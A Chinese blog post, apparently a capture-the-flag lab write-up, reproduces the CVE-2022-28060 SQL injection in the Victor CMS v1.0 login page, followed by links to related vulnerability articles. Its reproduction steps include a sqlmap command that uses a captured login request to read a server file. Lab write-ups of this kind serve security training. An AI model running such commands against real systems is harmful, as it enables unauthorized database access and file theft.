Victor CMS 登录sql注入（CVE-2022-28060）

风中追风-fzzf

于 2024-07-30 09:36:11 发布

阅读量169

点赞数 3

分类专栏： # SQL注入文章标签：安全

本文链接：https://blog.csdn.net/qq_23003811/article/details/140788251

版权

SQL注入专栏收录该内容

12 篇文章 0 订阅

订阅专栏

一、漏洞概述

Victor CMS v1.0 /includes/login.php 存在sql注入

二、影响范围

Victor CMS v1.0

三、访问页面

四、漏洞复现

1、输入任意账号密码，点击登录，抓包。

2、复制登录请求包到1.txt文件，放到sqlmap目录下。

python sqlmap.py -r 1.txt --file-read "/flag" --dbms mysql --batch


//-file-read "/flag" 可以直接在数据库里找到相关的内容并保存到本地计算机。

3、打开本地文件，获取flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

风中追风-fzzf

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Victor CMS SQL注入漏洞(CVE-2022-28060)

千寻的博客

11-28

1578

Victor CMS v1.0 /includes/login.php 存在sql注入

Victor CMS SQL注入漏洞（ CVE-2022-26201）

千寻的博客

12-01

1879

Victor CMS v1.0 存在二次注入漏洞

参与评论您还未登录，请先登录后发表或查看评论

CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入

qq_38733240的博客

06-03

389

Victor CMS v1.0 /includes/login.php 存在sql注入

Victor CMS v1.0 SQL 注入漏洞（CVE-2022-28060）

最新发布

Flag少侠的博客

07-01

1万+

CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于文件中的user_name参数。攻击者可以通过发送特制的 SQL 语句，利用这个漏洞执行未授权的数据库操作，从而访问或修改数据库中的敏感信息。春秋云镜靶场是一个专注于网络安全培训和实战演练的平台，旨在通过模拟真实的网络环境和攻击场景，提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点：实战演练：提供各种网络安全攻防演练场景，模拟真实的网络攻击事件，帮助用户在实际操作中掌握网络安全技术。

Victor CMS v1.0 存在sql注入

weixin_46420165的博客

12-08

768

Victor CMS v1.0 /includes/login.php 存在sql注入。

CVE-2022-28060

龙狼刺的博客

06-11

304

Victor CMS v1.0 /includes/login.php 存在sql注入。

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC

08-10

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本，参考官网链接： ...

WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf

09-27

【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题，涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入，但因为`WP_Query`经常被WordPress插件广泛使用，所以其潜在的危害...

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

Victor CMS 未授权sql注入（CVE-2020-29280）

00勇士王子的博客

08-08

781

漏洞名称 Victor CMS 未授权sql注入 漏洞等级高危爆发时间 2020-11-27 漏洞简介 Victor CMS是一个简单的内容管理系统。 Victor CMS存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。影响版本 The Victor CMS v1.0 漏洞复现这里用的是云演的在线环境，这个漏洞的环境是免费的打开漏洞环境，根据漏洞描述，漏洞应该存在于search搜索框用burp抓搜索框的包，发现是传入的是post参数search 单引号报错加上注释后页面返回正常

CVE-2022-28060(Victor CMS v1.0 )

qq_45092459的博客

11-27

1336

存在问题本：Victor CMS v1.0 看到页面简单，然后旁边有一个登陆框，尝试登陆框哪里进行套路尝试(弱口令万能和注入)，见过注入有戏，吧他拿到sqlmp跑一下。然后找到flag。

【春秋云境】CVE-2022-28060

ZXW_NUDT的博客

02-22

2840

【春秋云境】CVE-2022-28060

春秋云境：CVE-2022-28060

一只爱吃橙子的羊

11-29

2536

Victor CMS v1.0 /includes/login.php 存在sql注入

春秋云境：CVE-2022-28060（SQL注入）

m0_65712192的博客

04-20

826

Victor CMS v1.0 /includes/login.php 存在sql注入

CVE-2022-28060 i春秋云镜

biejianghua的博客

11-28

929

i春秋云镜CVE-2022-28060

[春秋云镜] CVE-2022-28060 详细讲解

weixin_60374959的博客

11-28

2988

Victor CMS v1.0 /includes/login.php 存在sql注入。

[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

qq_49199168的博客

10-30

2334

[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

春秋云境系列靶场记录（合集）-不再更新

一只爱吃橙子的羊

11-29

7284

春秋云境系列靶场记录合集，不更新了哈……

Apache Spark 命令注入漏洞（CVE-2022-33891）修复与利用

Apache Spark 命令注入漏洞（CVE-2022-33891） Apache Spark 命令注入漏洞（CVE-2022-33891）是 Apache Spark 中的一种高危漏洞，允许攻击者通过命令注入来执行恶意命令，从而控制服务器。该漏洞影响 Apache Spark ...